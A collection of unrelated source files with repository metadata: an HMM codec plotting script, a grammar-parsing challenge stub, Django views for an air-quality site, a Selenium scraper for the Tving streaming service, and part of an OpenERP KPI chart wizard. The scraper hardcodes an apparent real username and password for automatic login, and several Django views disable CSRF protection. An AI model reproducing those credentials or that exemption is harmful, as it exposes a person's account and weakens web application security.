num_states = 32
init_params = initialize_hmm_parameters(num_states, num_outputs)
print('Training hmm_codec with EM...')
a0, a, b = EM(init_params, train_inputs, print_loglike)
from matplotlib import pyplot as plt
from matplotlib import ticker
plt.rcParams.update({"text.usetex": True})
h = hmm_codec.HyperParams(num_states, num_outputs, T=1 << 9)
print('Hyperparameter settings:')
print(h)
xs = np.concatenate(compress_inputs)[:h.T]
params = list(map(partial(hmm_codec.quantized_cdf, h), (a0, a, b)))
rng = np.random.default_rng(1)
lengths = []
hs = []
message_lengths = []
l = 4
while l <= h.T:
codec = hmm_codec.hmm_codec(replace(h, T=l), params)
lengths.append(l)
hs.append(-hmm_codec.hmm_logpmf(h, params, xs[:l]) / l)
message = cs.base_message(1)
message = codec.push(message, xs[:l])
message_lengths.append(len(cs.flatten(message)) * 32 / l)
l = 2 * l
fig, ax = plt.subplots(figsize=[2.7,1.8])
ax.plot(lengths, np.divide(message_lengths, hs), color='black', lw=.5)
ax.set_yscale('log')
ax.yaxis.set_minor_locator(ticker.FixedLocator([1., 2., 3., 6., 10.]))
ax.yaxis.set_major_locator(ticker.NullLocator())
ax.yaxis.set_minor_formatter(ticker.ScalarFormatter())
ax.hlines(y=1, xmin=0, xmax=h.T + 1, color='gray', lw=.5)
ax.set_xlim(0, h.T)
ax.set_xlabel('$T$')
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_linewidth(0.5)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_linewidth(0.5)
ax.tick_params(width=.5)
plt.tight_layout()
plt.savefig('em_model.pdf')
| UTF-8 | Python | false | false | 5,022 | py | 5 | generate_model_plot.py | 3 | 0.638192 | 0.623656 | 0 | 148 | 32.932432 | 78 |
DayGitH/Python-Challenges | 7,894,149,913,220 | 9c07989fe2d9c7f6bf2f7f8c5222161cdf9734f6 | f1961c86e6da14f35c21d7235f4fc8a89fabdcad | /DailyProgrammer/DP20130118C.py | 160f08637796b83bdedb555ed267c1057285d4c5 | [
"MIT"
]
| permissive | https://github.com/DayGitH/Python-Challenges | d4930bdd85cd1a977d8f6192775ca956a375fcde | bc32f1332a92fcc2dfa6f5ea4d95f8a8d64c3edf | refs/heads/master | 2021-01-17T13:01:03.784523 | 2018-06-29T23:49:04 | 2018-06-29T23:49:04 | 58,497,683 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
[01/18/13] Challenge #117 [Hard] Verify Your Language!
https://www.reddit.com/r/dailyprogrammer/comments/16t2sx/011813_challenge_117_hard_verify_your_language/
# [](#HardIcon) *(Hard)*: Verify Your Language!
[Context-free grammar](http://en.wikipedia.org/wiki/Context-free_grammar) is a tool heavily used in programming
language design, verification, compiling, and execution. It is, essentially, a formal language used to define a grammar
(i.e. another language). CFG are "more powerful" (in that they can verify more complex languages) than other grammars,
such as regular-expressions.
Programming language expressions are generally validated through CFGs. This is done by applying several products on an
expression, subdividing the statement into known components, and finally into "terminal" components (i.e. parts of an
expression that cannot be more subdivided). An example could be a CFG that only accepts addition expressions, such as
"123 + 456". Such a CFG would have two rules that could be applied to verify if this expression was valid: A -> Int +
Int, and Int -> '0123456789'Int | NULL
It is ** extremely important** that the reader understands CFG and the formal language associated with it - the above
is simply a refresher / casual introduction to the subject.
Your goal is to write a program that accepts a CFG definition and a series of expressions, printing true or false for
each expression if it is a valid expression of the given CFG.
*Author: nint22*
# Formal Inputs & Outputs
## Input Description
First, your program must accept an integer N, where there will be N products, one per line, right below this integer.
To keep things simple, products must be a single upper-case letter, such as "S". The letter "E" is reserved as the
null-terminator. The equal-character "=" is reserved as the product definition operator. Finally, the pipe-character
"|" is reserved for defining sets of possible products.
This syntax is similar to the "on-paper" definition, with the small difference of substituting "E" and "->" for the
greek-letter and arrow symbols.
Assume that the grammar is valid; you do not have to error-check or handle "bad" CFG definitions.
Next, you program must accept an integer M, where there will be M expressions, one per line, that must be tested by the
above-defined grammar.
## Output Description
For each expression M, print true or false, based on wether or not the expression is a valid expression of the given
CFG.
# Sample Inputs & Outputs
## Sample Input
3
S = SS
S = (S)
S = ()
4
()
((()))
(()(()))
(()
## Sample Output
True
True
True
False
# Challenge Input
8
S = x
S = y
S = z
S = S + S
S = S - S
S = S * S
S = S / S
S = ( S )
3
( x + y ) * x - z * y / ( x + x )
(xx - zz + x / z)
x + y * x - z * y / x + x
## Challenge Input Solution
True
False
False
# Note
Some grammars may be ambiguous! Make sure to research what that means, though it should not affect your solution - I
mention this simply to give you a warning if you see odd parsing behavior while debugging.
*Bonus*: A short-hand method of having multiple products from one function-name is the "pipe operator", such as "S = x
| y | z", instead of three separate "S = x", "S = y", "S = z". Support this notation system as a bonus.
"""
def main():
pass
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 3,430 | py | 922 | DP20130118C.py | 921 | 0.708163 | 0.695627 | 0 | 82 | 40.829268 | 119 |
sousajmr/ptpy | 9,311,489,120,173 | 5fbf25023f9ba420a1c9b9078d8daba96209a727 | 531ed2d580fd389cb472af8344ed0caf9e241a89 | /tornado/demos/lihuashu/docs/common_bak/toto.py | 471e34816d90197016e3c994ad63f2aee6bc323d | []
| no_license | https://github.com/sousajmr/ptpy | dee83971973ce0069b1b27aeab16bca4a3a6504a | f35169ecf410240e7569ff0195524f874ca6660e | refs/heads/master | 2021-01-10T20:08:15.848115 | 2013-04-05T05:23:02 | 2013-04-05T05:23:02 | 10,300,362 | 1 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null | #coding:utf8
#from fdfs import Fdfs
#fs=Fdfs()
#fs.open()
from kyototycoon import KyotoTycoon
k=KyotoTycoon()
k.open()
po=k.set("编解码;编解码","编码编码编码编码编码",60)
print(po)
'''
p=k.remove('jia')
print(p)
'''
p=k.get_str("编解码;编解码")
print(p) | UTF-8 | Python | false | false | 289 | py | 345 | toto.py | 237 | 0.640816 | 0.628571 | 0 | 15 | 14.466667 | 35 |
fazeVaib/Zephyr | 7,954,279,454,840 | 5aa58e12a9fc9c11a85ca4709872488cd3716305 | b9c78fe1f197be8e99b0a89c52aec2a9a36e4ce1 | /src/app_zephyr/views.py | 77df1a01570fd6e2e523ee882b62146466a2e564 | []
| no_license | https://github.com/fazeVaib/Zephyr | 54d7009b5622b485e32d863cb9a810449d37023b | 27729b1dc2772d268a4797938e605a09b66f514a | refs/heads/master | 2022-12-10T15:40:45.603656 | 2020-06-07T15:06:16 | 2020-06-07T15:06:16 | 175,456,694 | 7 | 1 | null | false | 2022-06-21T21:46:35 | 2019-03-13T16:15:33 | 2022-05-05T08:48:33 | 2022-06-21T21:46:35 | 57,030 | 7 | 1 | 5 | JavaScript | false | false | from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.views import View
from .stats import get_stat_data
from .daily_predicted_data_delhi import get_daily_delhi_pred
from .monthly_predicted_data import get_monthly_pred
from .yearly_predicted_data import get_yearly_pred
from .live_data import get_live_data
from pprint import pprint
from .models import CityName
from zephyr.settings import BASE_DIR
from zephyr_api.models import ZephyrDailyAPI, ZephyrMonthlyAPI, ZephyrYearlyAPI
import os
import pandas as pd
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# class Index(View):
# def get(self, request, *args, **kwargs):
# context = {}
# return render(requests, "app_zephyr/index.html", context)
#
# def post(self, requests, *args, **kwargs):
# city_n = requests.POST.get("clickedCity")
# print(city_n)
# q_set = CityName.objects.filter(id=1)
# if q_set.count() != 0:
# obj = q_set.first()
# obj.city = city_n
# obj.save()
# context = {}
# return render(request, "app_zephyr/index.html", context)
@csrf_exempt
def indexView(request, *args, **kwargs):
if request.method == "GET":
context = {}
print(BASE_DIR)
return render(request, "app_zephyr/index.html", context)
elif request.method == "POST":
city_n = request.POST.get("clickedCity")
print(city_n)
q_set = CityName.objects.filter(id=1)
if q_set.count() != 0:
obj = q_set.first()
obj.city = city_n
obj.save()
context = {}
return render(request, "app_zephyr/index.html", context)
@csrf_exempt
def dataPageView(request, *args, **kwargs):
if request.method == "GET":
q_set = CityName.objects.filter(id=1)
if q_set.count() != 0:
obj = q_set.first()
city = obj.city
print("City Name Received: " + city)
live_data = get_live_data(city)
print(live_data)
context = {
"city_name": city,
"data": live_data
}
return render(request, "app_zephyr/second.html", context)
elif request.method == "POST":
pass
class LiveDataView(View):
def get(self, request, *args, **kwargs):
q_set = CityName.objects.filter(id=1)
if q_set.count() != 0:
obj = q_set.first()
city = obj.city
print("City Name Received: " + city)
live_data = get_live_data(city)
# pprint(stat_data)
return JsonResponse(live_data, safe=False)
class DailyDataView(View):
def get(self, request, *args, **kwargs):
daily_delhi_pred = get_daily_delhi_pred(BASE_DIR)
# pprint(daily_delhi_pred)
return JsonResponse(daily_delhi_pred)
class MonthlyDataView(View):
def get(self, request, *args, **kwargs):
q_set = CityName.objects.filter(id=1)
if q_set.count() != 0:
obj = q_set.first()
city = obj.city
print("City Name Received: " + city)
monthly_data = get_monthly_pred(city, BASE_DIR)
# pprint(monthly_data)
return JsonResponse(monthly_data)
class YearlyDataView(View):
def get(self, request, *args, **kwargs):
q_set = CityName.objects.filter(id=1)
if q_set.count() != 0:
obj = q_set.first()
city = obj.city
print("City Name Received: " + city)
# monthly_data = get_monthly_pred(city)
yearly_data = get_yearly_pred(city, BASE_DIR)
# pprint(yearly_data)
return JsonResponse(yearly_data)
class StatisticsDataView(View):
def get(self, request, *args, **kwargs):
# return HttpResponse("<h1> This is the Home Page. </h1>")
stat_data = get_stat_data(BASE_DIR)
# pprint(stat_data)
return JsonResponse(stat_data)
class StatisticsView(View):
def get(self, request, *args, **kwargs):
# return HttpResponse("<h1> This is the Home Page. </h1>")
stat_data = get_stat_data(BASE_DIR)
# pprint(stat_data)
return render(request, "app_zephyr/sidebar.html", stat_data)
class DatabaseDailyPredictedDatafill(View):
def get(self, request, *args, **kwargs):
# qs = ZephyrDailyAPI.objects.all()
# for i in qs:
# print(i, type(i), i.daily_updated)
# i.delete()
# print("Object deleted")
# df = pd.read_csv("/media/rishi/01D3D31D70AD1520/MINOR_PROJECT/zephyr_project/src/app_zephyr/daily_predicted_data_delhi/predicted_delhi.csv")
# print(df.count())
# print(df.values)
# c = 0
# for j in df.values:
# print(j[0], j[1])
# obj = ZephyrDailyAPI()
# obj.daily_city = "Delhi"
# obj.daily_date = j[0]
# obj.daily_aqi = j[1]
# obj.save()
# print(c)
# print("================================")
# c += 1
# print(c)
return HttpResponse("<h1> This is the Database Daily Predicted Data Fill Page. </h1>")
class DatabaseMonthlyPredictedDatafill(View):
def get(self, request, *args, **kwargs):
# qs = ZephyrMonthlyAPI.objects.all()
# for i in qs:
# # print(i, type(i), i.daily_updated)
# i.delete()
# # print("Object deleted")
# folder_path = "/media/rishi/01D3D31D70AD1520/MINOR_PROJECT/zephyr_project/src/app_zephyr/monthly_predicted_data/"
# dirs = os.listdir(
# "/media/rishi/01D3D31D70AD1520/MINOR_PROJECT/zephyr_project/src/app_zephyr/monthly_predicted_data")
# # print(dirs)
# # c = 0
# for i in dirs:
# # print(folder_path+i)
# df = pd.read_csv(folder_path + i)
# # print(i[5:-4])
# # print(df.count())
# # print(df.values)
# for j in df.values:
# # print(j[0], j[6], i[5:-4])
# obj = ZephyrMonthlyAPI()
# obj.monthly_city = i[5:-4]
# obj.monthly_date = j[0]
# obj.monthly_aqi = j[6]
# obj.save()
# # print(c)
# # print("================================")
# # c += 1
# # print(c)
return HttpResponse("<h1> This is the Database Monthly Predicted Data Fill Page. </h1>")
class DatabaseYearlyPredictedDatafill(View):
def get(self, request, *args, **kwargs):
# qs = ZephyrYearlyAPI.objects.all()
# for i in qs:
# # print(i, type(i), i.daily_updated)
# i.delete()
# # print("Object deleted")
# folder_path = "/media/rishi/01D3D31D70AD1520/MINOR_PROJECT/zephyr_project/src/app_zephyr/yearly_predicted_data/"
# dirs = os.listdir(
# "/media/rishi/01D3D31D70AD1520/MINOR_PROJECT/zephyr_project/src/app_zephyr/yearly_predicted_data")
# # print(dirs)
# # c = 0
# for i in dirs:
# # print(folder_path+i)
# df = pd.read_csv(folder_path + i)
# # print(i[5:-4])
# # print(df.count())
# # print(df.values)
# for j in df.values:
# # print(j[0], j[6], i[5:-4])
# obj = ZephyrYearlyAPI()
# obj.yearly_city = i[5:-4]
# obj.yearly_date = j[0]
# obj.yearly_aqi = j[6]
# obj.save()
# # print(c)
# # print("================================")
# # c += 1
# # print(c)
return HttpResponse("<h1> This is the Database Yearly Predicted Data Fill Page. </h1>")
| UTF-8 | Python | false | false | 7,768 | py | 209 | views.py | 28 | 0.550206 | 0.536432 | 0 | 221 | 34.149321 | 150 |
jofrankiewicz/AZ | 429,496,770,326 | e999ae780f36ac516419280204079bc0e888f837 | f1d115e44e22e2cc45619edf681451feda3e5f74 | /run.py | e6df99891f99a54346218602646f9a769fd3a47c | []
| no_license | https://github.com/jofrankiewicz/AZ | f66186d6e4f4dd2ac4cb5cf2e1b21510c36b1784 | 43e08ec75d0e53e26bcff3a6f3f3a23fabe434d2 | refs/heads/master | 2023-05-02T22:07:07.898205 | 2021-05-17T14:36:18 | 2021-05-17T14:36:18 | 349,590,548 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import argparse
import time
import glob
import argparse
import random
from alghoritms import Graph
from generate_files import random_graphs
def main():
    print('Starting the TSP solver program')
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-g', '--generation', dest='generation', type=bool, default=False,
help='generate graph data')
parser.add_argument('-nv', '--n_val', dest='n_val', type=int, default=600,
help='number of vertices')
parser.add_argument('-mv', '--max_val', dest='max_val', type=int, default=10000,
help='maximum value in graph data')
random.seed(34)
args = vars(parser.parse_args())
if args['generation']:
random_graphs(args['n_val'], args['max_val'])
mylist = [f for f in glob.glob("graph*")]
for filename in mylist:
g = Graph(-1, filename)
name_details=filename.split('_')
methods = [(g.twoApproximation,"2_Approximation"),
(g.christofide, "Christofides")]
f = open("results.txt", "a")
for i, (method, name) in enumerate(methods):
start = time.time()
method()
result = g.tourValue()
end = time.time()
result_time = end-start
print("Ilość wierzchołków: {}, Max waga: {}, Algorytm: {}, Wartość cyklu: {}, Czas: {}".format(name_details[1], name_details[2], name, result, result_time))
f.write(str(name_details[1]))
f.write(" ")
f.write(str(name_details[2]))
f.write(" ")
f.write(str(name_details[3]))
f.write(" ")
f.write(name)
f.write(" ")
f.write(str(result))
f.write(" ")
f.write(str(result_time))
f.write('\n')
f.close()
main() | UTF-8 | Python | false | false | 1,971 | py | 103 | run.py | 6 | 0.551759 | 0.54309 | 0 | 63 | 30.142857 | 168 |
yasmin2496/DSA_Quick_Reference | 8,615,704,420,111 | 77d525217897bdfe4f3f91dea0086ef51f7b4168 | d28c0ef18e7a341e15be98359f4480b5e20e2363 | /solutions/singly_linked_list.py | b31b974eca20d4b367c9ad94b239e1267082f0f0 | [
"MIT"
]
| permissive | https://github.com/yasmin2496/DSA_Quick_Reference | 7d71d609a0e50b65b31b69d86904f9fc4b3a7243 | 827a7d3331d9224e8bb21feb9151a89fc637a649 | refs/heads/main | 2023-04-16T14:24:11.801530 | 2021-04-27T16:15:36 | 2021-04-27T16:15:36 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
class Node:
def __init__(self, value):
self.value = value
self.next = None
class LinkedList:
def __init__(self):
self.head = None
def append(self, value):
if self.head is None:
self.head = Node(value)
return
node = self.head
while node.next:
node = node.next
node.next = Node(value)
def to_list(self):
out_list = []
node = self.head
while node:
out_list.append(node.value)
node = node.next
return out_list
def size(self):
count = 1
node = self.head
if node == None:
return 0
while node.next:
count += 1
node = node.next
return count
def iter(self):
node = self.head
while node:
val = node.value
node = node.next
yield val
def delete(self, value):
node = self.head
prev = self.head
while node:
if node.value == value:
if node == self.head:
                    self.head = node.next
else:
prev.next = node.next
return
prev = node
node = node.next
def search(self, value):
node = self.head
while node:
if node.value == value:
return True
node = node.next
return False
# Test Case
linked_list = LinkedList()
linked_list.append(5)
linked_list.append(7)
linked_list.append(-1)
linked_list.append(0.9)
linked_list.append(71)
iter_test = []
for value in linked_list.iter():
iter_test.append(value)
print ("Pass" if (linked_list.to_list() == [5, 7, -1, 0.9, 71]) else "Fail")
print ("Pass" if (linked_list.size() == 5) else "Fail")
print ("Pass" if (iter_test == [5, 7, -1, 0.9, 71]) else "Fail")
linked_list.delete(-1)
print ("Pass" if (linked_list.to_list() == [5, 7, 0.9, 71]) else "Fail")
print ("Pass" if (linked_list.search(99) == False) else "Fail")
print ("Pass" if (linked_list.search(7) == True) else "Fail")
| UTF-8 | Python | false | false | 2,142 | py | 46 | singly_linked_list.py | 20 | 0.50747 | 0.49113 | 0 | 94 | 21.765957 | 76 |
AotY/char-lstm | 1,013,612,294,154 | 241f4af055f70070536254f6fedae596b99c765b | 6a4a1875e5f8cff0112e6f45e34b25f909d3d034 | /data_set.py | c775330f56009c2435450ed5354affd7774f0cd5 | []
| no_license | https://github.com/AotY/char-lstm | bcc35fe15ad9b1b5d915ba770cabacfb0164155d | 0bb9be96e3af1380609b95ae81651ec74125086e | refs/heads/master | 2020-04-01T20:06:57.319229 | 2018-10-18T09:38:12 | 2018-10-18T09:38:12 | 153,589,069 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright © 2018 LeonTao
#
# Distributed under terms of the MIT license.
"""
"""
from __future__ import unicode_literals, print_function, division
from io import open
import glob
import os
import unicodedata
import string
import random
import torch
import torch.nn as nn
# sos: - , eos: <
all_letters = '-' + string.ascii_letters + " .,;'<"
n_letters = len(all_letters) + 1 # Plus EOS marker
def findFiles(path):
return glob.glob(path)
# Turn a Unicode string to plain ASCII, thanks to http://stackoverflow.com/a/518232/2809427
def unicodeToAscii(s):
return ''.join(
c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn'
and c in all_letters
)
# Read a file and split into lines
def readLines(filename):
lines = open(filename, encoding='utf-8').read().strip().split('\n')
return [unicodeToAscii(line) for line in lines]
# Build the category_lines dictionary, a list of lines per category
category_lines = {}
all_categories = []
for filename in findFiles('data/names/*.txt'):
category = os.path.splitext(os.path.basename(filename))[0]
all_categories.append(category)
lines = readLines(filename)
category_lines[category] = lines
n_categories = len(all_categories)
if n_categories == 0:
raise RuntimeError('Data not found. Make sure that you downloaded data '
'from https://download.pytorch.org/tutorial/data.zip and extract it to '
'the current directory.')
# Random item from a list
def randomChoice(l):
return l[random.randint(0, len(l) - 1)]
# Get a random category and random line from that category
def randomTrainingPair():
category = randomChoice(all_categories)
line = randomChoice(category_lines[category])
return category, line
# One-hot vector for category
def categoryTensor(category, device):
li = all_categories.index(category)
tensor = torch.zeros(1, n_categories, dtype=torch.long, device=device)
tensor[0][li] = 1
return tensor
# One-hot matrix of first to last letters (not including EOS) for input
def inputTensor(line, device):
tensor = torch.zeros(len(line), dtype=torch.long, device=device)
for li in range(len(line)):
letter = line[li]
tensor[li] = all_letters.find(letter)
return tensor
# LongTensor of second letter to end (EOS) for target
def targetTensor(line, device):
letter_indexes = [all_letters.find(line[li]) for li in range(1, len(line))]
letter_indexes.append(n_letters - 1) # EOS
return torch.LongTensor(letter_indexes, device=device)
# Make category, input, and target tensors from a random category, line pair
def randomTrainingExample(device):
category, line = randomTrainingPair()
category_tensor = categoryTensor(category, device)
    input = inputTensor(line, device)
    target = targetTensor(line, device)
return category_tensor, input, target
def next_batch(max_len, batch_size, device=None):
categories = torch.empty((batch_size, n_categories), dtype=torch.long, device=device)
inputs = torch.empty((max_len, batch_size), dtype=torch.long, device=device)
targets = torch.empty((max_len, batch_size), dtype=torch.long, device=device)
inputs_length = []
for i in range(batch_size):
        category_tensor, input, target = randomTrainingExample(device)
inputs_length.append(len(input))
categories[i] = category_tensor
for j, (i_index, t_index) in enumerate(zip(input, target)):
inputs[j, i] = i_index
targets[j, i] = t_index
inputs_length = torch.LongTensor(inputs_length, device=device)
return categories, inputs, inputs_length, targets
| UTF-8 | Python | false | false | 3,702 | py | 5 | data_set.py | 3 | 0.691975 | 0.684139 | 0 | 116 | 30.887931 | 91 |
boo9305/python | 16,123,307,238,248 | 1353e2a2577cf85b0646e0e01f88c0939f277396 | e980207805af1d868a1418527d0be25727c9c878 | /selenium/tving_contents_parser.py | a7408100b23bafcc531a8fc7277463200131b467 | []
| no_license | https://github.com/boo9305/python | 3b279899825e788386f610918c15fd68893ad138 | 1bd689e3182da6bbeda61d2a22de4372a37e57db | refs/heads/master | 2023-02-23T00:38:39.948478 | 2021-01-25T07:07:12 | 2021-01-25T07:07:12 | 328,588,500 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys, time, atexit, json, requests
import settings
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from pyvirtualdisplay import Display
from parser import Parser
class TvingParser(Parser):
main_url = 'https://www.tving.com/vod/genre'
contents_list = []
def __init__(self):
super().__init__()
def __del__(self):
super().__del__()
def login(self):
## 1. move start url
self.driver.get(url='https://user.tving.com/pc/user/login.tving?returnUrl=https%3A%2F%2Fuser.tving.com%2Fpc%2Fuser%2Flogin.tving')
print(self.driver.current_url)
## 2. login
id = self.driver.find_element_by_id('a')
pw = self.driver.find_element_by_id('b')
id.send_keys('zoflr9305')
pw.send_keys('qls0926!')
sm = self.driver.find_element_by_id('doLoginBtn')
sm.click()
time.sleep(1)
print(self.driver.current_url)
profile = self.driver.find_element_by_class_name('profile-icon')
profile.click()
time.sleep(1)
print(self.driver.current_url)
def search_contents_detail(self):
for item in self.contents_list:
self.driver.get(url=item['url'])
soup = BeautifulSoup(self.driver.page_source, 'html.parser')
print(soup.p)
def search_contents_list(self):
self.driver.get(url=self.main_url)
pheight = self.driver.execute_script('return document.body.scrollHeight')
nheight = 0 ;
print(self.driver.current_url)
# scrolling ...
while pheight != nheight:
print('doing scrolling %d' % nheight)
self.driver.execute_script('window.scrollTo(0, document.body.scrollHeight);')
time.sleep(0.3)
pheight = nheight
nheight = self.driver.execute_script('return document.body.scrollHeight')
items = self.driver.find_elements_by_class_name('program-item__info')
link_list = []
# get url list
print('getting url list')
total = 0
for item in items:
item_a = item.find_element(By.TAG_NAME, 'a')
a = item_a.get_attribute('href')
link_list.append(a)
total += 1;
item_a = None;
# write logfile about content
f = open('./logfile', 'w')
for idx, item in enumerate(link_list):
print('running... %s \t %d/%d' % (item, idx, total))
content_dic = {}
self.driver.get(url=item)
try :
content_dic['title'] = self.driver.find_element_by_class_name('title').text
except :
pass
try :
summary = self.driver.find_element_by_class_name('summary').text
except :
pass
try :
content_dic['genre'] = self.driver.find_element_by_class_name('under').text
except :
pass
try :
dds = self.driver.find_elements_by_tag_name('dd')
c = 0;
actor = ""
director = ""
for idx2, dd in enumerate(dds):
if idx2 == 1:
content_dic['actor'] = dd.text
elif idx2 == 2:
content_dic['director'] = dd.text
except:
pass;
content_dic['url'] = item
f.write(str(content_dic) + "\n")
f.close()
## move netfilx movie genre url
#self.driver.get(url=self.movie_korea_url)
#print(self.driver.current_url)
## get movie list by BeautifulSoup
#soup = BeautifulSoup(self.driver.page_source, 'html.parser')
#data =soup.find('script', type='application/ld+json')
#for el in json.loads(data.string)['itemListElement'] :
## print(el)
# item = el['item']
# d = {}
# d['name'] = item['name']
# d['url'] = item['url']
# self.contents_list.append(d)
#return self.contents_list;
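    # --- Editor's hedged example ------------------------------------------
    # search_contents_list() writes one str(dict) per line to ./logfile.  The
    # helper below is a minimal sketch (not called anywhere in this script) of
    # how those lines could be read back into dictionaries; it assumes the
    # same hard-coded './logfile' path used above.
    def read_logfile(self, path='./logfile'):
        import ast
        records = []
        with open(path) as f:
            for line in f:
                line = line.strip()
                if line:
                    # each line is a Python dict literal produced by str(dict)
                    records.append(ast.literal_eval(line))
        return records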
def test(self):
self.driver.get(url='https://www.tving.com/movie/player/M000331735')
print(self.driver.current_url)
title = ""
try :
dt = self.driver.find_elements_by_css_selector('.info > dt')
dt_dd = self.driver.find_elements_by_css_selector('.info > dt ~ dd')
print("??")
for idx, xx in enumerate(dt) :
print('%s : %s ' %(dt[idx].text, dt_dd[idx].text))
except :
print("error")
genre = ""
try :
genre = self.driver.find_element_by_class_name('under').text
except :
print("error")
print(title, genre)
if __name__ == '__main__':
tool = TvingParser();
tool.test()
# tool.login()
# tool.search_contents_list()
| UTF-8 | Python | false | false | 5,175 | py | 17 | tving_contents_parser.py | 14 | 0.529469 | 0.521739 | 0 | 164 | 30.54878 | 138 |
hungphatsource/HungPhatSourceCode | 15,212,774,163,305 | b008bc087343aa21cd86d44362ab4c4eb06074a3 | 06598dfdde0cb0ecdd0af6b5aaab57b26aa9d23c | /hpusa_kpis_manufacturing/wizard/wizard_hp_report_kpis_chart.py | a03fc44c50445923b21e795da3907a792b42dd07 | []
| no_license | https://github.com/hungphatsource/HungPhatSourceCode | 98f99d87f0a07ffbf7c622037ea6e87e162c763d | 11141af1fdd397590a1a5a7f7d8dd65abf53a59a | refs/heads/master | 2021-01-21T13:57:40.494472 | 2016-05-13T07:34:35 | 2016-05-13T07:34:35 | 53,999,296 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from osv import fields, osv
from tools.translate import _
from dateutil.relativedelta import relativedelta
import time
from datetime import datetime
from datetime import timedelta
from openerp.addons.pxgo_openoffice_reports import openoffice_report
from openerp.report import report_sxw
class wizard_hp_report_chart_kpis(osv.osv_memory):
_name = "wizard.hp.report.chart.kpis"
_columns = {
'type': fields.selection([
('3d', '3D Design'),
('casting', 'Casting'),
('assembling', 'Assembling'),
('setting', 'Setting'),
], 'Report Type',select=True,required=True),
'option': fields.selection([
('month', 'Month Report'),
('year', 'Year Report'),
], 'Option',select=True),
'month': fields.many2one('account.period', 'Month'),
'month_from': fields.many2one('account.period', 'Month From'),
'month_to': fields.many2one('account.period', 'Month To'),
'type_report': fields.selection([
('synthetic', 'Synthetic chart'),
('productivity', 'Productivity chart'),
('productivity_worker', 'Productivity chart of worker'),
('compare', 'Comparing synthesis workers'),
], 'Chart Type',select=True,required=True),
'employee_id': fields.many2one('hr.employee', 'Worker'),
}
_defaults={
'option': 'month'
}
wizard_hp_report_chart_kpis()
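# --- Editor's hedged example --------------------------------------------------
# Each wizard below recomputes the four weekly date windows of the selected
# month inline.  The helper below is a minimal sketch of that shared logic
# (it is not referenced by the wizards); it assumes date_start/date_stop are
# datetime objects covering the period, as produced by strptime above.
def _example_week_windows(date_start, date_stop):
    windows = []
    date_to = date_start
    for i in range(1, 5):
        if i == 1:
            date_from = date_to
        else:
            date_from = date_to + relativedelta(days=1)
        date_to = date_from + relativedelta(days=6)
        if i == 4:
            # the last window is clamped to the end of the period
            date_to = date_stop
        windows.append((date_from, date_to))
    return windows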
class wizard_hp_report_chart_kpis_3d(osv.osv_memory):
_name = "wizard.hp.report.chart.kpis.3d"
_table = "wizard_hp_report_chart_kpis"
_inherit = "wizard.hp.report.chart.kpis"
def action_view_chart(self, cr, uid, ids, context):
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
obj = self.browse(cr, uid, ids[0], context)
if obj.type_report == 'synthetic':
_3d_ids = self.pool.get('hp.kpis.view.chart.3d').search(cr, uid, [])
if(_3d_ids):
self.pool.get('hp.kpis.view.chart.3d').unlink(cr, uid, _3d_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                        # work out the date range of each week
if(i == 1):
date_from = date_to
else:
date_from = date_to + relativedelta(days=1)
date_to = date_from + relativedelta(days=6)
#get report 3d line
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _3d_report_id in _3d_report_ids:
line = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.3d').create(cr, uid, {'name': 'Week '+str(i),'point': point, 'quantity': qty})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _3d_report_id in _3d_report_ids:
line = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.3d').create(cr, uid, {'name': month.name,'point': point, 'quantity': qty})
#open action
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_3d_graph')
elif obj.type_report == 'productivity' or obj.type_report == 'productivity_worker':
_3d_ids = self.pool.get('hp.kpis.view.chart.3d.productivity').search(cr, uid, [])
if(_3d_ids):
self.pool.get('hp.kpis.view.chart.3d.productivity').unlink(cr, uid, _3d_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                    # initialise the chart columns for each week
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': 0, 'quantity': 0})
